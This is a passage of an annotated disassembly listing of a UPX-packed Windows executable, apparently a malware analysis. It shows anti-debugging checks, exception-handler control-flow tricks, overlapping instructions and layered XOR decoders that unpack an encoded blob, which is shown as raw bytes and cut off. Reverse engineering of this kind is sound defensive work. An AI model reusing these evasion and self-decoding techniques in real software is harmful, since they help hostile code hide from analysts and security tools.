                xor     ecx, ecx                ; match length accumulator
                sub     eax, 3
                jb      short loc_31427C10      ; prefix value 2: reuse the previous offset (ebp)
                shl     eax, 8
                mov     al, [esi]               ; low 8 offset bits come from the byte stream
                inc     esi
                xor     eax, 0FFFFFFFFh         ; offset = NOT(value), i.e. a negative distance
                jz      short loc_31427C82      ; value 0FFFFFFFFh is the end-of-stream marker
                mov     ebp, eax                ; remember as last offset

loc_31427C10:                                   ; CODE XREF: UPX1:31427C01j
                add     ebx, ebx                ; first of two length bits
                jnz     short loc_31427C1B
                mov     ebx, [esi]
                sub     esi, 0FFFFFFFCh
                adc     ebx, ebx

loc_31427C1B:                                   ; CODE XREF: UPX1:31427C12j
                adc     ecx, ecx
                add     ebx, ebx                ; second length bit
                jnz     short loc_31427C28
                mov     ebx, [esi]
                sub     esi, 0FFFFFFFCh
                adc     ebx, ebx

loc_31427C28:                                   ; CODE XREF: UPX1:31427C1Fj
                adc     ecx, ecx
                jnz     short loc_31427C4C      ; non-zero two-bit length: use it directly
                inc     ecx                     ; otherwise read a variable-length value, start at 1

loc_31427C2D:                                   ; CODE XREF: UPX1:31427C3Cj
                                                ; UPX1:31427C47j
                add     ebx, ebx
                jnz     short loc_31427C38
                mov     ebx, [esi]
                sub     esi, 0FFFFFFFCh
                adc     ebx, ebx

loc_31427C38:                                   ; CODE XREF: UPX1:31427C2Fj
                adc     ecx, ecx                ; data bit into the length
                add     ebx, ebx                ; stop bit, same scheme as for the offset
                jnb     short loc_31427C2D
                jnz     short loc_31427C49
                mov     ebx, [esi]
                sub     esi, 0FFFFFFFCh
                adc     ebx, ebx
                jnb     short loc_31427C2D

loc_31427C49:                                   ; CODE XREF: UPX1:31427C3Ej
                add     ecx, 2                  ; bias for the long-length encoding

loc_31427C4C:                                   ; CODE XREF: UPX1:31427C2Aj
                cmp     ebp, 0FFFFF300h         ; CF = 1 when the distance exceeds 0D00h
                adc     ecx, 1                  ; length += 1, or += 2 for far matches
                lea     edx, [edi+ebp]          ; edx = match source inside the output
                cmp     ebp, 0FFFFFFFCh
                jbe     short loc_31427C6C      ; distance >= 4: dword-at-a-time copy is safe

loc_31427C5D:                                   ; CODE XREF: UPX1:31427C64j
                mov     al, [edx]               ; distance < 4: source and destination overlap,
                inc     edx                     ; so copy byte by byte
                mov     [edi], al
                inc     edi
                dec     ecx
                jnz     short loc_31427C5D
                jmp     loc_31427BCE
; ---------------------------------------------------------------------------
                align 4

loc_31427C6C:                                   ; CODE XREF: UPX1:31427C5Bj
                                                ; UPX1:31427C79j
                mov     eax, [edx]
                add     edx, 4
                mov     [edi], eax
                add     edi, 4
                sub     ecx, 4
                ja      short loc_31427C6C
                add     edi, ecx                ; ecx <= 0 here: pull edi back over the overshoot
                jmp     loc_31427BCE
; ---------------------------------------------------------------------------

; Stage 2: reverse the call/jmp filter over the unpacked output.
loc_31427C82:                                   ; CODE XREF: UPX1:31427C0Cj
                pop     esi                     ; esi = output base pushed at stub entry
                mov     edi, esi
                mov     ecx, 7Eh                ; number of operands to convert

loc_31427C8A:                                   ; CODE XREF: UPX1:31427C91j
                                                ; UPX1:31427C96j
                mov     al, [edi]
                inc     edi
                sub     al, 0E8h                ; al = 0 or 1 for opcode bytes E8h / E9h

loc_31427C8F:                                   ; CODE XREF: UPX1:31427CB4j
                cmp     al, 1
                ja      short loc_31427C8A      ; not E8h/E9h: keep scanning
                cmp     byte ptr [edi], 1       ; filtered operands carry a 01h marker byte
                jnz     short loc_31427C8A
                mov     eax, [edi]              ; marker + 3 stored operand bytes
                mov     bl, [edi+4]             ; byte following the operand
                shr     ax, 8                   ; drop the marker ...
                rol     eax, 10h
                xchg    al, ah                  ; ... and reorder the three remaining bytes
                sub     eax, edi                ; turn the stored value back into a
                sub     bl, 0E8h
                add     eax, esi                ; displacement relative to the operand position
                mov     [edi], eax
                add     edi, 5
                mov     eax, ebx                ; al = (next byte - 0E8h), tested at loc_31427C8F
                loop    loc_31427C8F

; Stage 3: import resolution.  The table at esi+5000h holds, per DLL, a name
; offset and a thunk-table offset, followed by the function entries; a zero
; dword ends the table.
                lea     edi, [esi+5000h]

loc_31427CBC:                                   ; CODE XREF: UPX1:31427CDEj
                mov     eax, [edi]
                or      eax, eax
                jz      short loc_31427D07      ; zero name offset: all DLLs done
                mov     ebx, [edi+4]
                lea     eax, [eax+esi+7000h]    ; eax = pointer to the DLL name
                add     ebx, esi                ; ebx = thunk table to fill in the unpacked image
                push    eax
                add     edi, 8
                call    dword ptr [esi+708Ch]   ; first KERNEL32 thunk of the UPX2 import table;
                                                ; presumably LoadLibraryA (first name in the UPX2
                                                ; name strings) -- IDA left this slot unlabelled
                xchg    eax, ebp                ; ebp = module handle

loc_31427CD9:                                   ; CODE XREF: UPX1:31427CFFj
                mov     al, [edi]               ; entry type byte
                inc     edi
                or      al, al
                jz      short loc_31427CBC      ; 0: end of this DLL's entries
                mov     ecx, edi
                jns     short near ptr loc_31427CEA+1 ; sign bit clear: import by name (see below)
                movzx   eax, word ptr [edi]     ; sign bit set: import by ordinal
                inc     edi
                push    eax                     ; ordinal is the second call argument
                inc     edi

; The jns above lands one byte inside the next instruction.  IDA shows the
; bytes B9 57 48 F2 AE as a single mov; read from the second byte they are
; push edi / dec eax / repne scasb, i.e. push the name pointer and advance edi
; past the NUL-terminated name.  On the by-ordinal fall-through the B9 opcode
; swallows those bytes so they do not execute.
loc_31427CEA:                                   ; CODE XREF: UPX1:31427CE2j
                mov     ecx, 0AEF24857h
                push    ebp                     ; module handle
                call    dword ptr [esi+7090h]   ; dword_31428090, labelled GetProcAddress by IDA
                or      eax, eax
                jz      short loc_31427D01      ; lookup failed
                mov     [ebx], eax              ; store the resolved address in the thunk table
                add     ebx, 4
                jmp     short loc_31427CD9
; ---------------------------------------------------------------------------

loc_31427D01:                                   ; CODE XREF: UPX1:31427CF8j
                call    dword ptr [esi+7094h]   ; third KERNEL32 thunk; presumably ExitProcess
                                                ; by position in the name list -- confirm

; Stage 4: hand over to the unpacked program.
loc_31427D07:                                   ; CODE XREF: UPX1:31427CC0j
                popa                            ; restore the registers saved at stub entry
                jmp     loc_31422334            ; entry of the unpacked code, below the packed data
; ---------------------------------------------------------------------------
                align 400h
UPX1            ends

; Section 3. (virtual address 00008000)
; Virtual size                  : 00021000 ( 135168.)
; Section size in file          : 00021000 ( 135168.)
; Offset to raw data for section: 00008000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment     : default
; ===========================================================================

; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX2            segment para public 'CODE' use32
                assume cs:UPX2
                ;org 31428000h
                assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing

; PE import directory of the packed file, laid out as 5-dword descriptors of
; which only the 4th (DLL name RVA) and 5th (thunk table RVA) are non-zero.
; Six descriptors, then an all-zero terminator.
                dd 3 dup(0)
                dd 80C4h, 808Ch, 3 dup(0)
                dd 80D1h, 809Ch, 3 dup(0)
                dd 80DEh, 80A4h, 3 dup(0)
                dd 80E9h, 80ACh, 3 dup(0)
                dd 80F4h, 80B4h, 3 dup(0)
                dd 8100h, 80BCh, 5 dup(0)
; Thunk tables, one zero-terminated list per DLL.  The values are absolute
; addresses, i.e. the slots were already resolved when this image was captured.
                dd 7C801D77h                    ; slot used by the stub via [esi+708Ch]
dword_31428090  dd 7C80ADA0h                    ; resolved to->KERNEL32.GetProcAddress
                                                ; sub_3143B9DB+4Cr ...
                dd 7C81CDDAh, 0                 ; slot used by the stub via [esi+7094h]
                dd 77DD6BF0h, 0
                dd 77C371D3h, 0
                dd 7E41A8ADh, 0
                dd 42C2C8A1h, 0
                dd 71AB9639h, 0
; Import name strings stored as dwords.  Read as ASCII they spell the DLL names
; KERNEL32.DLL, ADVAPI32.dll, MSVCRT.dll, USER32.dll, WININET.dll, WS2_32.dll
; and the function names LoadLibraryA, GetProcAddress, ExitProcess,
; RegCloseKey, rand, wsprintfA, InternetOpenA.
                dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
                dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
                dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
                dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h
                dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
                dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 61720000h
                dd 646Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h
                dd 6E65704Fh, 41h, 26h dup(0)
; ---------------------------------------------------------------------------
; Program entry point.  It sits in UPX2 rather than in the UPX1 stub above and
; consists of a short anti-analysis prologue and a single-byte XOR decoder:
;   1. execute two bytes placed on the stack (nop / retn);
;   2. install an SEH frame and force a fault, so that execution resumes in
;      the handler instead of after the faulting instruction;
;   3. read PEB.BeingDebugged and skip the decoder if it is set;
;   4. XOR-decode a region in place and "return" into a computed address.
; The DATA XREF ...w comments show that code elsewhere writes into this
; sequence, so the bytes captured here may not be the only form it takes.
; ---------------------------------------------------------------------------

                public start
start:
                push    0ED01C390h              ; stack bytes 90 C3 01 ED = nop / retn / filler
                mov     eax, esp
                call    eax                     ; run the two stack bytes; needs an executable
                                                ; stack.  NOTE(review): looks like an emulator or
                                                ; DEP probe -- intent not provable from here
                xchg    eax, ebx
                pop     ebx                     ; ebx = 0ED01C390h, the value pushed above
                call    loc_31428269            ; the return address pushed here becomes the SEH
                                                ; handler address (see loc_31428269)
                mov     esp, [esp+8]            ; DATA XREF: sub_314439D7+6w
                                                ; handler entry: [esp+8] is the establisher frame
                                                ; argument, so this restores esp to the SEH frame
                mov     eax, 4EBh               ; CODE XREF: UPX2:31428219j
                                                ; DATA XREF: sub_3143B9DB+6w
                                                ; immediate bytes EB 04 double as a short jmp
                jmp     short near ptr loc_31428214+1 ; into the mov above; the EB 04 there skips
                                                ; forward to the instruction after this jmp
; ---------------------------------------------------------------------------
                mov     eax, fs:18h             ; TEB self pointer
                mov     eax, [eax+30h]          ; TEB+30h = PEB
                movzx   eax, byte ptr [eax+2]   ; PEB+2 = BeingDebugged
                cmp     eax, 0
                jnz     short locret_31428268   ; debugger flag set: skip the decoder
                call    $+5                     ; push own address ...
                pop     ebp                     ; ... and pop it: position-independent base
                sub     ebp, 402334h            ; ebp = runtime address - 402334h, so the
                                                ; [ebp+4023xxh] operands below address a
                                                ; parameter block 47h..57h bytes after the pop
                mov     eax, [ebp+40237Bh]      ; parameter: source offset
                add     eax, [ebp+402383h]      ; + parameter: base
                mov     esi, eax                ; esi = start of region to decode
                mov     eax, [ebp+40237Fh]      ; parameter: continuation offset
                add     eax, [ebp+402383h]      ; + base
                push    eax                     ; consumed by the retn below
                mov     edi, esi                ; decode in place
                xor     ecx, ecx                ; byte counter

loc_31428257:                                   ; CODE XREF: UPX2:31428266j
                lodsb
                xor     al, [ebp+40238Bh]       ; parameter: one-byte XOR key
                stosb
                inc     ecx
                cmp     ecx, [ebp+402387h]      ; parameter: length (signed compare)
                jl      short loc_31428257

locret_31428268:                                ; CODE XREF: UPX2:3142822Aj
                retn                            ; on the decode path: jump to the pushed address
; ---------------------------------------------------------------------------

loc_31428269:                                   ; CODE XREF: UPX2:3142820Bp
                sub     eax, eax
                push    dword ptr fs:[eax]      ; SEH frame: previous record ...
                mov     fs:[eax], esp           ; ... with the caller's return address as handler
                mov     eax, 12345678h
                xchg    eax, [ebx]              ; memory access at 0ED01C390h.  NOTE(review): a
                                                ; user-mode access this high is expected to fault
                                                ; on 32-bit Windows, which would run the handler
; The four "instructions" below and the dw/db after them are probably data.
; NOTE(review): counted as bytes they fit the decoder's parameter block
; (source offset 6000h, continuation offset 7BB0h, base 31420000h, length
; 1E00h, key 78h).  This is reconstructed from instruction lengths only;
; verify against the raw bytes before relying on it.
                add     [eax+0], ah
                add     [eax+7Bh], dh
                add     [edx+31h], al
                add     [esi], bl
; ---------------------------------------------------------------------------
                dw 0
                db 78h

; =============== S U B R O U T I N E =======================================

; Second decoder stage: sets up a stack frame, installs an SEH frame whose
; handler is the `call sub_31428337` below, and finishes in the function chunk
; at loc_314282EF, which XOR-decodes the blob after sub_31428337 and jumps
; into it.  Its only caller in this listing is the call at 314282C3.

sub_31428289    proc near                       ; CODE XREF: UPX2:314282C3p

var_1C          = byte ptr -1Ch
var_8           = dword ptr -8

; FUNCTION CHUNK AT 314282EF SIZE 00000045 BYTES

                pusha                           ; 8 saved registers; reloaded by popa in the chunk
                push    ebp
                mov     ebp, esp
                call    loc_3142829C            ; pushes the address of the next instruction,
                                                ; which loc_3142829C turns into the SEH handler
                call    sub_31428337            ; SEH handler body: redirects the faulting thread
                jmp     loc_314282EF            ; execution resumes here after the exception
sub_31428289    endp

; ---------------------------------------------------------------------------

loc_3142829C:                                   ; CODE XREF: sub_31428289+4p
                push    dword ptr fs:0          ; SEH frame: previous record ...
                mov     fs:0, esp               ; ... handler = return address of the call above
                xor     ebx, ebx
                push    ebx
                push    ebx
                push    ebx
                push    ebx
                push    80000000h
                push    ebx
                push    ebx
                push    ebx
                push    ebx
                push    ebx
                push    10h
                push    ebx
                push    800h
                call    sub_31428289            ; as disassembled this re-enters sub_31428289.
                                                ; NOTE(review): the listing does not show what
                                                ; raises the exception the handler waits for --
                                                ; confirm in a debugger or emulator
; IDA decoded the next bytes linearly and left the rest undefined; they do not
; read as meaningful instructions in this form.
                xor     [ecx], esi
                fld     tbyte ptr [eax+0]
                add     [ecx], al
                add     [eax+0], ch
; ---------------------------------------------------------------------------
                dw 0
                dd 406880h, 680000h, 53800000h, 68535353h, 8, 8C15FF53h
                db 80h, 42h, 31h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_31428289

loc_314282EF:                                   ; CODE XREF: sub_31428289+Ej
                sub     ebx, ebx
                sub     ecx, ecx
                mov     cl, 21h

loc_314282F5:                                   ; CODE XREF: sub_31428289+6Dj
                inc     ebx                     ; count to 21h with a loop instead of an
                loop    loc_314282F5            ; immediate: ebx = 21h (the XOR key), ecx = 0
                call    sub_31428334            ; ecx = address of the next instruction
                add     ecx, 47h                ; ecx = start of the encoded blob
                push    ecx                     ; keep the start address for the final jump
                mov     edx, 243Ch              ; number of bytes to decode

loc_31428309:                                   ; CODE XREF: sub_31428289+90j
                mov     al, [ecx]
                xor     ax, bx                  ; only al is stored: each byte ^= 21h
                mov     [ecx], al
                add     ecx, 1
                sub     edx, 1
                cmp     edx, 0
                ja      short loc_31428309      ; until edx reaches 0
                pop     ecx                     ; ecx = start of the decoded blob
                mov     esp, fs:0               ; unwind to the SEH frame ...
                pop     dword ptr fs:0          ; ... and unlink it
                lea     ebp, [esp+20h+var_1C]   ; = esp+4: the slot holding the saved ebp
                leave                           ; esp now points at the pusha block
                mov     [esp+20h+var_8], ecx    ; = esp+18h: overwrite the saved ecx slot
                popa                            ; registers restored, ecx = decoded blob
                jmp     ecx                     ; continue in the freshly decoded code
; END OF FUNCTION CHUNK FOR sub_31428289

; =============== S U B R O U T I N E =======================================

; Returns its own return address in ecx (get-current-address helper).

sub_31428334    proc near                       ; CODE XREF: sub_31428289+6Fp
                pop     ecx                     ; ecx = return address
                push    ecx                     ; put it back so retn still works
                retn
sub_31428334    endp


; =============== S U B R O U T I N E =======================================

; Body of the SEH handler installed by loc_3142829C.  After the call that
; enters it, [esp+10h] is the handler's 4th stack dword (the context record
; argument of an x86 SEH handler).  The pop stores this routine's own return
; address -- the `jmp loc_314282EF` -- at offset 0B8h of that record (Eip in
; the x86 CONTEXT layout), eax = 0 asks the dispatcher to continue execution,
; and the retn then returns to the dispatcher.

sub_31428337    proc near                       ; CODE XREF: sub_31428289+9p

arg_C           = dword ptr  10h

                mov     ecx, [esp+arg_C]        ; ecx = context record pointer
                xor     eax, eax                ; return value 0
                pop     dword ptr [ecx+0B8h]    ; resume address = our return address
                retn
sub_31428337    endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; Encoded blob processed by loc_314282EF (243Ch bytes, each XORed with 21h).
; By the instruction lengths, return address + 47h is the first byte here;
; XOR 21h turns the leading bytes B1 C9 21 21 21 21 into 90 E8 00 00 00 00
; (nop / call $+5).  NOTE(review): offsets derived from the XREF addresses in
; this listing; verify on the binary.
                dd 2121C9B1h, 25AA2121h, 0AA1D605h, 21212105h, 0A8A12121h
                dd 21088DB9h, 57DAA21h, 0DD0C5525h, 9191A878h, 0A8212108h
                dd 21089599h, 0E99A121h, 0C9212105h, 0B9222C54h, 21210511h
                dd 0DE237AAAh, 0AA29CA12h, 210510B9h, 7A12DE21h, 4DA0B474h
                dd 21242505h, 
0C2A02121h, 0DEDED121h, 3127CCA0h, 5DAA2161h dd 94AC2505h, 2161151Dh, 21212198h, 0A085D221h, 49756F5Ah dd 2C545248h, 0AC1D62AAh, 0A0473925h, 55647119h, 21CAA029h dd 54212120h, 5971AAC3h, 53AAF222h, 396BAA01h, 8C70D222h dd 59A0E222h, 446621DEh, 0A03A5455h, 53712259h, 3354424Eh dd 602659A0h, 54534545h, 2A59A028h, 21525244h, 0F6C32455h dd 8E27C78h, 53AA052Dh, 0D2227805h, 6F25962Eh, 223D5BAAh dd 0A615AADAh, 2DC9D222h, 62212121h, 44524E4Dh, 454F4069h dd 7221444Dh, 0A4A8F7DEh, 2161141Dh, 21212CC9h, 44536221h dd 64445540h, 554F4457h, 0DE722160h, 61A4A8F7h, 0C9216114h dd 2121212Ch, 6D554466h, 64555240h, 534E5353h, 0F7DE7221h dd 1465A4A8h, 51C92161h, 0A4212121h, 710055E1h, 1465B4DEh dd 0E1A42161h, 0A4AC3154h, 216130F3h, 0C9DE71ABh, 2121214Fh dd 0B4DE5DCAh, 2161141Dh, 1510A4D6h, 21212161h, 3F55A121h dd 151494ACh, 5DAA2161h, 84852505h, 1893BCAAh, 94AA2161h dd 21611897h, 189B9CAAh, 0E27C2161h, 4B214B7Bh, 4B214B21h dd 21204921h, 0E5AA2125h, 4B71214Bh, 0DEE5AA2Dh, 7E7577C3h dd 12212112h, 0DEFBC9E8h, 0B4ACDEDEh, 21613080h, 71707073h dd 1461B4DEh, 0E5A22161h, 0D3ABE201h, 21037E98h, 61311121h dd 0D8C3F723h, 0C66E5E2h, 0B9B524EDh, 0D60827Dh, 99D55158h dd 0FCADC4DEh, 723571EDh, 89317038h, 0B3DC628Dh, 0A645109Ch dd 794CCF68h, 0D897B2FDh, 0DBC79E25h, 68A6031Dh, 398C8FB8h dd 1E6B233Dh, 4A9654CBh, 20E4215Dh, 0F9C079D8h, 32708C7Dh dd 0AAD55158h, 0B198EC94h, 48353198h, 0CA5BA9A3h, 264A518Dh dd 69503508h, 269D70EDh, 99105F2h, 5EDE91CDh, 6AE58BC9h dd 69B599EEh, 0CC0CC93Dh, 59D5E45Dh, 0A98CEF75h, 46F55B6Dh dd 0C9F0C9E8h, 9615944Dh, 16DB90D9h, 4CB8E652h, 0C94551BDh dd 0ADACBE06h, 0A865A197h, 7965B100h, 8AD00CFDh, 0EA55D1DFh dd 0EA471E78h, 853ED1C1h, 89B6C957h, 64005C54h, 5AE56107h dd 3009BAC6h, 0CE3B112Ah, 9ABD4651h, 1625605Dh, 0B9002138h dd 0E9C1C2BDh, 5D1A9108h, 0D69A5F3Fh, 5375DB7Ah, 0D45E9FCh dd 193D11CDh, 96A5E0DDh, 3980A1B8h, 4645443Dh, 0A66B5489h dd 0F9E54BE2h, 0BDF53105h, 48C56B7Dh, 0F3821DA5h, 0E84D315Ch dd 63570ADh, 89301128h, 0D91F398Dh, 0BC9AA19Ch, 393584BDh dd 9458415h, 
0E70178CDh, 69CF1E22h, 13BF1274h, 0F5103E37h dd 0B2959138h, 1466E2ECh, 0B9B5041Dh, 0BE410E7Dh, 712AEEB3h dd 0E925615Bh, 0B57125E3h, 5CFA41F1h, 0D9556405h, 3E161410h dd 0F046B1ADh, 3C953C70h, 12E4918Dh, 6BE3094Eh, 0C436F12Dh dd 49C5F4C5h, 5A11DE0Dh, 221ADEE3h, 0F9C0E5E8h, 88B5FE7Dh dd 0AA4094C2h, 6CAE611Dh, 0F9754445h, 46043142h, 9926B308h dd 0F1E02A9Dh, 0C675F1D8h, 8CCA808Dh, 1915A224h, 5C796C56h dd 7056F16Dh, 0C684B0C2h, 19A62788h, 5417C91Dh, 478CE92h dd 89853733h, 99BFDEC6h, 99DAB8ABh, 0FAD4F2A9h, 300601D7h dd 0B3153BDAh, 0B6D02C85h, 8075F1F8h, 94581E1h, 1DD84546h dd 965A1F90h, 0F41E97D2h, 49858C39h, 0F2F3D10Dh, 2E16690h dd 0DF59D55Fh, 0E33EE3D6h, 0F01B794Dh, 25AE615Dh, 3DBE71C7h dd 0C96D41D7h, 0B31D518Dh, 4337F0DDh, 0AC8AE1E3h, 905B41Dh dd 59911295h, 69CC2FB5h, 13617A2Dh, 23494A3Dh, 3395BB4Dh dd 0A98F731Fh, 0B99CFF05h, 0D8C56B7Dh, 6685EE27h, 0A91085C8h dd 7C6C2EADh, 0EE814E42h, 54EAAE70h, 6975A128h, 330108EDh dd 0E6CE81FDh, 0F4D4343Eh, 69E5F1DDh, 6DF974A0h, 0A97AC17Dh dd 41754480h, 56B7215Dh, 0F9C0ADF8h, 89D3E97Dh, 0F699114Dh dd 99500A32h, 8F5C03FDh, 0AE602DD4h, 0B57407E8h, 2924C4E8h dd 71E04EBDh, 8045C1C8h, 5960DD48h, 3F1B1DDh, 864A9B0Dh dd 9B02DA8h, 655540Dh, 0C3731E68h, 32A3676Fh, 0DBC46BA9h dd 99D500A5h, 0AD40325Dh, 9E4013C8h, 0BF6C33EDh, 0BE703DE4h dd 0D633A1F8h, 7940FD78h, 5F810AFDh, 4F05C79Bh, 0B9301E8Ah dd 0FAB5B118h, 0B6D2D1F9h, 19A0ED98h, 0C3E54B1Dh, 0C960CE6Fh dd 30C54148h, 99D51065h, 60C44ACAh, 0AE6155A1h, 0FCA9D442h dd 2F2651CDh, 1F59041Eh, 6D75B1ADh, 0B9D07EAAh, 9C55D1F8h dd 2FF9951Dh, 0BB10FAEh, 6DF13ED3h, 3395BB05h, 170DE37h dd 3CF57158h, 1A1975BDh, 99D12CA5h, 78EC525Dh, 7C0C414Eh dd 0C9457781h, 189479F8h, 2965AC33h, 6F25E5BDh, 5A15D1ACh dd 2C3D0432h, 0A920E19Dh, 86BA8574h, 0C68DE549h, 19A3ED88h dd 5449C91Dh, 46A6CE92h, 0C9F03DE8h, 184DFA4Dh, 0E9244999h dd 6CCA26ADh, 0C9457481h, 26EEB464h, 292C2C62h, 392DE9B5h dd 945A833h, 19559CA8h, 69A5E1DCh, 79B5F12Dh, 4985C13Dh dd 0A6C6875Ch, 0E9D06988h, 15AC9A6Dh, 72B0C1F9h, 0C516FFAFh dd 8C56001Fh, 
9C5810E3h, 0A3670ED9h, 0AA6132E8h, 1B56F6C1h dd 4B1CE7B2h, 6545F489h, 7527E5BEh, 2AA58FB8h, 0DD4945Fh dd 25EC8758h, 1A959068h, 0DD84446Fh, 0D59C7708h, 0F9A44C18h dd 0FEBB783Dh, 9B66611Ch, 9C4110C8h, 0AA6A33EDh, 986622E8h dd 4C17E29Dh, 6B10C58Ch, 7D2AEC98h, 6B3DC5A8h, 69C180B8h dd 18D0836Eh, 21D1A449h, 3DF4B47Fh, 0CC97621Dh, 0ED90450Ch dd 0E1A96E12h, 0AAA57D28h, 884B326Fh, 965D02DDh, 0B14041C9h dd 0B14125E4h, 4D04C4EFh, 551CF7EDh, 642CD598h, 4A3AC5A8h dd 0CD192A4h, 14DCA540h, 2CC2C158h, 35FC9779h, 0DD916078h dd 0CC97581Fh, 0C8B66409h, 0EDB0564Dh, 8C49081Bh, 9C4F18FEh dd 0BD6006BDh, 0BC7938CBh, 4C08C8C9h, 4D10F6EDh, 7C21EEB0h dd 781DF4A1h, 0CC985B3h, 1CF2F16Ch, 24E09549h, 35FC977Dh dd 0C4846F78h, 0FEF57008h, 0EC917518h, 0F8856120h, 0E9640929h dd 0AF4114EAh, 0A07633D8h, 9E153FE2h, 4C33D5F8h, 561CC29Fh dd 483DC493h, 783ADDCDh, 0BCCADB9h, 0C7905Fh, 28C8C17Ch dd 3CFC877Dh, 0EF836E6Ah, 0B9905D04h, 0E7A07132h, 0FCB9780Bh dd 99550010h, 0B8521FC4h, 0AC750EBDh, 0B66701E3h, 5A16C4FEh dd 5607E1EDh, 7A36E49Eh, 7013A3FEh, 69D192AFh, 1ADA837Dh dd 7AF6B258h, 21F09F3Fh, 0CCB62169h, 0D59C7719h, 0FDB14018h dd 0ECB7783Fh, 0A8560429h, 8D5022ADh, 0AC6928FBh, 0BC7838D9h dd 4C09F29Dh, 6A75C188h, 6C31F284h, 743CC5A0h, 2FCAB5B8h dd 2DD09D44h, 49E0AC54h, 38F8BF58h, 0CC8C776Dh, 0FF937E1Ah dd 89A06D14h, 0EDA7781Bh, 0A8490028h, 9A5A1DC1h, 0A07716BDh dd 0B05334F9h, 6765C4F1h, 5311F099h, 5931F288h, 7023F8BFh dd 0CC284B1h, 12DAA55Eh, 785AF58h, 3CE79279h, 0EF80557Ch dd 0B9905D04h, 0FB867533h, 0FCA17028h, 8A4A130Dh, 0F94602C8h dd 0BB4635F3h, 0BC6130E8h, 4A0AD3CDh, 7C06C288h, 7D0B8185h dd 7830E38Eh, 0CF684A9h, 16DC854Eh, 3DCBC153h, 0FE5B040h dd 0E6924474h, 0DA90620Bh, 0E7AA6809h, 0D6A15F4Dh, 0AF4B042Dh dd 0F9501DC4h, 0B94A35F3h, 0AB453FE8h, 5A00C2F2h, 521AE59Eh dd 4745EF98h, 7627C1B9h dd 1DC684A9h, 0DC7987Bh, 4E9A048h, 2BFABC68h, 0DDAB2164h dd 0CD9C433Ah, 0FBAC5718h, 0F5B46439h, 86480410h, 0AB3508DFh dd 0A7502DC9h, 0BD7A32E4h, 5B11F2F8h, 6D12DF84h, 7A2BC092h dd 6B21C2A4h, 69C28FB4h, 2AF4A27Ah, 
3DF7A049h, 3A95A178h dd 0CC964E71h, 0D2965E1Eh, 0EAC57518h, 0FCBB7F22h, 8E25153Eh dd 965D05C8h, 0B06735CEh, 0BC7830E3h, 4A00D39Dh, 5C06B19Bh dd 7A45E593h, 7C3EF2A2h, 7ECE1A9h, 17C79459h, 25C6B558h dd 11F0A262h, 0C5814F7Ch, 0D7BC3108h, 0E7B76409h, 0FC926528h dd 874A2229h, 8D5614C3h, 0BD5625D8h, 0D97025ECh, 4C11CFD4h dd 4D10DF9Fh, 6720F1B2h, 771C918Ch, 7D784A9h, 9FA8548h dd 3BD0AF58h, 10959061h, 0DB805573h, 0EB815403h, 0CFA16018h dd 99B07D24h, 0A873251Ch, 0CB0638FDh, 85490593h, 0BE70038Dh dd 5A0ACDDEh, 4010FA88h, 6E20D3FDh, 7730E182h, 2CDC8496h dd 2BB5B055h, 3CD4A658h, 0FECA368h, 0CC904D7Ch, 0B9B44928h dd 0DAA2642Fh, 0F8836528h, 0AC401431h, 7A3530D5h, 12E4454h dd 0D91539DCh, 65E8499Dh, 391FB2C9h, 59148497h, 9250FB9Eh dd 0BD2EB111h, 39DFA57Dh, 0B6D6936Ch, 19A02198h, 0A521A21Dh dd 8C01A492h, 4D46013Dh, 1482D245h, 0A930D0D8h, 0A9CA42ADh dd 0C76F41D7h, 0ECB1C472h, 0E9E0A1DDh, 39E535E2h, 611581FDh dd 1955F803h, 69CF3556h, 39DF3DA6h, 5985C155h, 0B97BB0Dh dd 678D2177h, 0D3F53104h, 0D996507Dh, 0AC3184B2h, 0B07A611Dh dd 0CC09E452h, 368041FDh, 549E0DF9h, 2925B415h, 0ACF8BD0Eh dd 90591FDh, 4A0240CEh, 0EC2E3322h, 79F5C4F9h, 6A114EB0h dd 0D7DD10Dh, 221ADEE2h, 0F9C0D9E8h, 684A8C7Dh, 71D5116Eh dd 16DA9E1Eh, 0CCEDF426h, 468841FDh, 0D9157265h, 0D69A9375h dd 0E5F03A12h, 8C45C1C8h, 945EE50Dh, 69861452h, 86A8192Dh dd 8E0E3EC2h, 0B1C01252h, 0A9E5211Dh, 0AD18B030h, 0BAC54167h dd 37509C84h, 0B8252140h, 0A96420F9h, 5CFA10ECh, 0D95564E1h dd 0D641A51Ah, 79408D78h, 0D87DCFDh, 19BDC4CDh, 34A5E1DDh dd 63F61CACh, 0B6EFC17Dh, 439B4480h, 0FBB5215Dh, 0B9D111A0h dd 4D460157h, 1C127741h, 0E9657B09h, 7CF25160h, 0C9455BEBh dd 0D93F51A9h, 280F62C0h, 0A8AB087h, 0F641F202h, 6D9514D8h dd 69AE892Dh, 0A93EF12Dh, 75D5C266h, 43E76480h, 136E215Dh dd 0B9F53061h, 88CD8BF6h, 61D6114Dh, 6245AA76h, 98938266h dd 2B4244C9h, 5AD7BA78h, 0A232AE5Ah, 0F5FEE239h, 492FD5ADh dd 0E63FC39Ch, 5C557422h, 0BD36F16Dh, 3D104A31h, 72959138h dd 0AE0FA2CAh, 0B99F36AAh, 0DE4C0195h, 83BFD24Eh, 0E92C8905h dd 0BBB871ADh, 0FBEBDCh, 
